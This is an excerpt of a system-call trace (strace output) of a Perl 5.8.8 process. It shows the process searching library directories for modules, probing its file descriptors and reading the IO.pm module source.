13008 07:45:13.309030 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfdb4720) = -1 ENOENT (No such file or directory)

13008 07:45:13.309045 stat64("/usr/local/lib/perl/5.8.7", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309058 stat64("/usr/local/share/perl/5.8.7", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309070 stat64("/usr/local/lib/perl/5.8.6", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309081 stat64("/usr/local/share/perl/5.8.6", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309093 stat64("/usr/local/lib/perl/5.8.4", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309105 stat64("/usr/local/share/perl/5.8.4", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309116 stat64("/usr/local/lib/perl/5.8.3", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309128 stat64("/usr/local/share/perl/5.8.3", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309139 stat64("/usr/local/lib/perl/5.8.2", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309151 stat64("/usr/local/share/perl/5.8.2", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309162 stat64("/usr/local/lib/perl/5.8.1", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309174 stat64("/usr/local/share/perl/5.8.1", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309185 stat64("/usr/local/lib/perl/5.8.0", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309197 stat64("/usr/local/share/perl/5.8.0", 0xbfdb4860) = -1 ENOENT (No such file or directory)

13008 07:45:13.309219 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdb4558) = -1 ENOTTY (Inappropriate ioctl for device)

13008 07:45:13.309232 _llseek(0, 0, [0], SEEK_CUR) = 0

13008 07:45:13.309244 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdb4558) = -1 EBADF (Bad file descriptor)

13008 07:45:13.309262 _llseek(1, 0, 0xbfdb45a0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

13008 07:45:13.309274 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdb4558) = -1 EINVAL (Invalid argument)

13008 07:45:13.309285 _llseek(2, 0, 0xbfdb45a0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

13008 07:45:13.309295 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

13008 07:45:13.309308 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdb4618) = -1 ENOTTY (Inappropriate ioctl for device)

13008 07:45:13.309322 _llseek(1, 0, [0], SEEK_CUR) = 0

13008 07:45:13.309333 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

13008 07:45:13.309345 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

13008 07:45:13.309364 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

13008 07:45:13.309416 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

13008 07:45:13.317575 getppid()         = 13006

13008 07:45:13.317678 stat64("/etc/perl/IO.pmc", 0xbfdb430c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317712 stat64("/etc/perl/IO.pm", 0xbfdb421c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317739 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfdb430c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317762 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfdb421c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317777 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfdb430c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317790 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfdb421c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317803 stat64("/usr/lib/perl5/IO.pmc", 0xbfdb430c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317815 stat64("/usr/lib/perl5/IO.pm", 0xbfdb421c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317828 stat64("/usr/share/perl5/IO.pmc", 0xbfdb430c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317839 stat64("/usr/share/perl5/IO.pm", 0xbfdb421c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317852 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfdb430c) = -1 ENOENT (No such file or directory)

13008 07:45:13.317865 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

13008 07:45:13.317885 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

13008 07:45:13.317899 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdb4028) = -1 ENOTTY (Inappropriate ioctl for device)

13008 07:45:13.317911 _llseek(6, 0, [0], SEEK_CUR) = 0

13008 07:45:13.317933 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413

13008 07:45:13.317990 stat64("/etc/perl/XSLoader.pmc", 0xbfdb3e5c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318003 stat64("/etc/perl/XSLoader.pm", 0xbfdb3d6c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318065 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pmc", 0xbfdb3e5c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318109 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pm", 0xbfdb3d6c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318123 stat64("/usr/local/share/perl/5.8.8/XSLoader.pmc", 0xbfdb3e5c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318136 stat64("/usr/local/share/perl/5.8.8/XSLoader.pm", 0xbfdb3d6c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318150 stat64("/usr/lib/perl5/XSLoader.pmc", 0xbfdb3e5c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318162 stat64("/usr/lib/perl5/XSLoader.pm", 0xbfdb3d6c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318189 stat64("/usr/share/perl5/XSLoader.pmc", 0xbfdb3e5c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318200 stat64("/usr/share/perl5/XSLoader.pm", 0xbfdb3d6c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318214 stat64("/usr/lib/perl/5.8/XSLoader.pmc", 0xbfdb3e5c) = -1 ENOENT (No such file or directory)

13008 07:45:13.318226 stat64("/usr/lib/perl/5.8/XSLoader.pm", {st_mode=S_IFREG|0644, st_size=3408, ...}) = 0

13008 07:45:13.318246 open("/usr/lib/perl/5.8/XSLoader.pm", O_RDONLY|O_LARGEFILE) = 8

